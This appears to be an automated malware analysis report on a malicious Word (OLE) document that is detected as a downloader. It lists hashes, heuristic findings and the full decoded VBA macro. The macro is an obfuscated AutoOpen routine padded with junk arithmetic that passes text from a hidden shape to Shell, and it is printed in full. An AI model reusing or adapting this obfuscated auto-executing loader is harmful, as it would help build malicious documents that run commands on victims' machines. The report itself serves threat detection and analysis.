Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b6225d16f07d33f…

MALICIOUS

Office (OLE)

135.4 KB Created: 2018-12-07 06:54:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 11edb16a28367f8bc85b85f637fb1a94 SHA-1: 819a53d9aa5c25cec0f9ad28664ed042f2634115 SHA-256: 2b6225d16f07d33fb329056ef0d2085db72abb53afca2dd8e5227580fecd6898
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6775737-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775737-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    LvJJrw = Array(cTpKkrQG, jVVZlNB, AiBuVMkVp, Interaction _
.Shell(CzJzlfbqw, kljqSJS), PTnbw)
         Set lHubifGQjQtZzvqKiAzfhajw = GAIWfEPlCzKmCHEktkHiRpbP
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
vvNVnt
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4980 bytes
SHA-256: 3c2e9ee09b0c321a3a2b4b348736377d3a1f6a8c5f4e9ecfdf9d0001d529cf07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
129 of 156 identifiers look randomly generated (e.g. 'KjZwcCEQhJXTThuQPBljRlaL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IGGtcDJOtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
vvNVnt
End Sub

Attribute VB_Name = "zcESHSFbijPlo"
Function vvNVnt()
On Error Resume Next
         Set RRPHZLTftPBTjaoYjZkfClY = iidRUUITsqCwVAijUX
      tqPBibsSKKXpjs = driBKYHiaqYrDfqBLikffOj
      qcBzIVAVDcXqBSMblIoLGjon = JMLvNNOLjLiXJZFqCn / CLng(178844538) * 54017798 / Tan(311343) + sRJtXZUsHnOizIpZqOIfSHiD - Cos(186766362) + (229746867 / Int(VDvNiTJUtmTqoqqDuIiaz))
         Set RzmACzsSNnAoShTY = QmsHhPAXWFFqjLpRlurvKjsj
      vmOnWjzKwRkVEkhlcjrmb = bKXhnccmjuJXlcljzVGfi
      FvjKKKhAAwIOLEQpwXiLhqM = wEztjVfvzhEcAcRSEjtMP / CLng(157411380) * 116881590 / Tan(221066029) + JZjzWMOizLFKoTiQMO - Cos(194276880) + (337966864 / Int(pUFQHwzASamSaXwwwdVqtA))
         Set jGjBLTfFfONZEMOEoHVW = zaMRViYcOlYNzSVDFU
      WrLmiuVGVERhERIifUkpp = dQdoMEutBimnAim
      hWAXDXwDUwrkpjUfsPOuJp = RMcDivRQiwsmNpSDFTZUP / CLng(85613513) * 65053829 / Tan(22595994) + OHukPrdsoiKaUOHCf - Cos(84042341) + (263547740 / Int(wGpZMJakUSECYlUoWfOEOtZG))
Set kFRRkAV = IGGtcDJOtz.Shapes(VHRVY + "LlJAwMOdcM" + QtXWi).TextFrame
         Set wkqqOBiizYLXsP = iSozhOWSKzrsZqaYfWGcjnvv
      vKjDlpirfGizDZncRjtWII = XzfAlnTuXtImEnOYHNAuks
      cwTAOHBYhmWLDFotEML = EunjoDHmJIODfYCE / CLng(117745187) * 256234267 / Tan(33964070) + VUazhbLTSTvhYhXhIkLKAP - Cos(97078681) + (170220435 / Int(TjfCkbRHZpjToBNsoTq))
         Set hwaUoaaiThwfspvNjiGQJX = URzBuvzlozSbruB
      BarhiBGrMqJlvbnf = nGDrYfnVvIhaODTf
      FqRpdTLFpDmMpMKmR = nwWcuEMjsYRzmp / CLng(40612913) * 201060158 / Tan(147660387) + OTJmslicAJFwXnzzfhvcvNdu - Cos(175482614) + (256514908 / Int(sQzFLpNYzuAGktSECiwAdA))
CzJzlfbqw = kFRRkAV.ContainingRange + GBaNu + iriazs + zBVwhbu + TiwSLw + spiihn + MmjdSOnS + kwhFfF + cwdba + nhYMBiv
         Set jwzXzShsmwlfiZZjhaho = riMSnhBiRMoIGtn
      ZZNSlizaWzqvbnLn = UoQmFLkfJVjwWYjlWHATWV
      jlvqrGHdBAWlEWbT = cncJPizYKJFfKTPz / CLng(180716831) * 218495419 / Tan(1177788) + UtYCriwAnbOuomqj - Cos(298893810) + (19612424 / Int(HvRhwCzqjHldpbJtjO))
         Set citqXlaYoSGklVr = dVLmnaSUXNbInZLS
      szkkDjjtLwGovNfAsp = PtQBPZTJKRlOHoPsYGcam
      tcbLfbAvIukdCbbvULk = YbajzAjUGtQOwnAoaDu / CLng(286637702) * 59786530 / Tan(98240341) + qiilnQdlRqMDRBrM - Cos(203215401) + (312738601 / Int(oOdVjPbnUQQsQJSjFUOs))
         Set GHuPikIjCbcBjOPYjZvzWalv = jNOnsPQYcoXmzXahFwSPQMo
      zWYapajVwXBXtvJLLdHZrlhB = QQcTjbUYRoWrqjBICn
      VCnKoHDnFOENpWFYKEC = vhwbHnUVtGRpwEjSc / CLng(45096035) * 260235898 / Tan(77548902) + oOKNajUlKrDAUjnDMCAm - Cos(224724247) + (297720558 / Int(zOPkpmwDRqqHSoOjGzkjPOpd))
         Set XsjbUnzborjVzzztCOpjLAsT = YvzAIJcupUXWzrSiWInI
      naBDkUholWANzwszafhH = HibWDXXEprFKzkVwwXo
      GEwXJzvZivcFBEfvZjhwJjv = vCBLXBdIsMTDjENDczZu / CLng(96580352) * 340965387 / Tan(60983121) + EZZPpslXITcGwjCdRUMolcP - Cos(135681590) + (126566658 / Int(TMJBQvtIHzbOSAbwuNcH))
Const kljqSJS = 0
         Set LrbBcwwEuijiOYaioRBuAw = RiwGKNdAjZSGuqvwiLZwu
      OvNbcbhwpmMIKTdrorRizFwS = nsVSibBnRTDsjkCSkjft
      jbSqXifMAJzvvpiMjGLLVs = azEGPPOVQYtHQC / CLng(185481404) * 72743443 / Tan(293498339) + aRJEwnvTGEdUiQnbrr - Cos(125861615) + (181803213 / Int(wloiXChRJDvSoubqW))
         Set vQSpvZsbITtIMknwHAijYnnv = imvjJFuswQIHbRzdj
      imiKjTdviFdXHcWXR = zrzNzQQUfqfiiDsXFJnTFb
      OWpOZJflEAMjoQU = OuLonPzWZfjWNjzhVllqJB / CLng(281503479) * 73511565 / Tan(337822864) + ahVWDGlWZYtnSwX - Cos(124728299) + (270608016 / Int(ZJXVDfLCfddNDAoipRBDbck))
LvJJrw = Array(cTpKkrQG, jVVZlNB, AiBuVMkVp, Interaction _
.Shell(CzJzlfbqw, kljqSJS), PTnbw)
         Set lHubifGQjQtZzvqKiAzfhajw = GAIWfEPlCzKmCHEktkHiRpbP
      qZroSLawfcfztELdouzj = bsuunpYPiQZtoofYwkm
      qXfZmzjwFdudiIPjwtfWC = ALFEEPjErKLziENVInJc / CLng(63994421) * 11937922 / Tan(145307384) + KjZwcCEQhJXTThuQPBljRlaL - Cos(126967446) + (173844491 / Int(rMZXwpJtYqiboFvQYhtBa))
         Set mIOrmWSjjTHHDDk = dGNjuXqbfTCzizZ
      iMPVLjYdBjfOvXRPrzvQf = NPSnMTTUBktWdro
      uwikhOsbjHCnGhDJF = wzDXUEJjiuUYuaacCz / CLng(222065231) * 309045951 / Tan(180879147) + XqHERfOUjkRIsoLWciaBjzGH - Cos(90033389) + (185205422 / Int(diEbKtzcNQQndRJO))
         Set KjTmaBXoZTZLMXrprNwOusZs = lPvJJUpmslCGwvzEFArYWLS
      uLPSKDRGasplcfQwkYT = oivSzKpshUYawSPzFXbpU
      fDFNcaksnzrhnLQzSAOZYGUP = JQStNziRsCrMliOIpjaiPf / CLng(24064572) * 216459937 / Tan(48645193) + bbuWZjqZTJRwaA - Cos(87235745) + (104006726 / Int(IZljRzQjatjYiMlmIVCWVdH))
         Set qmSGWKXNAuZqwRkTzUQbfw = CqqUjSjNQmmsFttDmKQwS
      aRCbCSFJqHuDQPjpovRj = DKYiaFQdROwQXPY
      HPRIHvfwCcdXzWVhl = WHdwcMofZswntAHXjf / CLng(341935004) * 162711251 / Tan(10749388) + faczctjvsQiBsRn - Cos(70429927) + (263218562 / Int(TbVmCOjcPZpqhM))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.